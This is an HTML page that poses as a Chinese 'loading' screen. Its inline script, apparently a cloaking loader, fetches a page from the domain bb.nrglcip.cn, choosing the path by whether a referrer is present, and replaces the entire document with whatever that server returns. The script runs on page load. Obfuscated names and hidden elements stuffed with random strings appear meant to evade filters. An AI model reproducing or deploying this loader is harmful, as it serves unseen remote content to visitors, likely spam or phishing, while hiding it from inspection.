<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .hv2c6AAx5 {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .hv2c6AAx5 .Z8OZSLel {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .hv2c6AAx5 .content {
            line-height: 50px;
            text-align: center
        }

        .hv2c6AAx5 .img {
            width: 100%
        }

        .hv2c6AAx5 .iHXWxUf0W {
            text-align: center
        }

        .hv2c6AAx5 .iHXWxUf0W span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .hv2c6AAx5 .iHXWxUf0W span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .hv2c6AAx5 .iHXWxUf0W span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .hv2c6AAx5 .iHXWxUf0W span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .hv2c6AAx5 .iHXWxUf0W span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .hv2c6AAx5 .iHXWxUf0W span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .hv2c6AAx5 .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function Smk5wlvhq9(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var KkEO3 = Smk5wlvhq9('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ KkEO3 +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ KkEO3 +".html?a=share";
		}
		
        MuBKxSZG=url+"#"+new Date().getTime();
        MuBKxSZG && function() {
            $.get(MuBKxSZG, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<a  href='#' style='display:none'>qJStVoCV9e9ETp0AkGxexdIqFCYPzWELy8Y0jsWTmtM9yZsY7oNS11EwoPDjnj52rcT0DZnduJLYoxSqOzJ7hjV</a>
<h1 style='display:none' >uga3Yu0LuPLVQmaveHssGQQOQurrkISfRsxWRGYIG8K</h1>
<h1 style='display:none' >uga3Yu0LuPLVQmaveHssGQQOQurrkISfRsxWRGYIG8K</h1>
<div style='display:none'>JN3n2lVIRgzyJgZBPX37SaQUAYjgKpLHbI71IG70IN1jc8iT</div><div class="hv2c6AAx5">
    <div class="Z8OZSLel">
        <div class="iHXWxUf0W">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<span style='display:none'>iJo1E1uYFoHG</span>
<li style='display:none' >mZnENCBFg0RWfroQsev0lZcsXNtI5bCApXbXsOmJn7I</li>
<ul style='display:none' >YS6o5uWqcuXxstncY9wpPsI9ZnoW0mILFDJlIdneQ1QdCPcy9evWCynaRReve9JDGB2zTQsJnpopulu4cSFKMRmSuJetSL40YZRo</ul>
<h1 style='display:none' >BaRcootcnwu1D290oi0BgxD9SRXoZJ3iCNlc5MXjvth9QCRcSnX3fEtJhFMmAypVuIPP3qo</h1></body>
</html>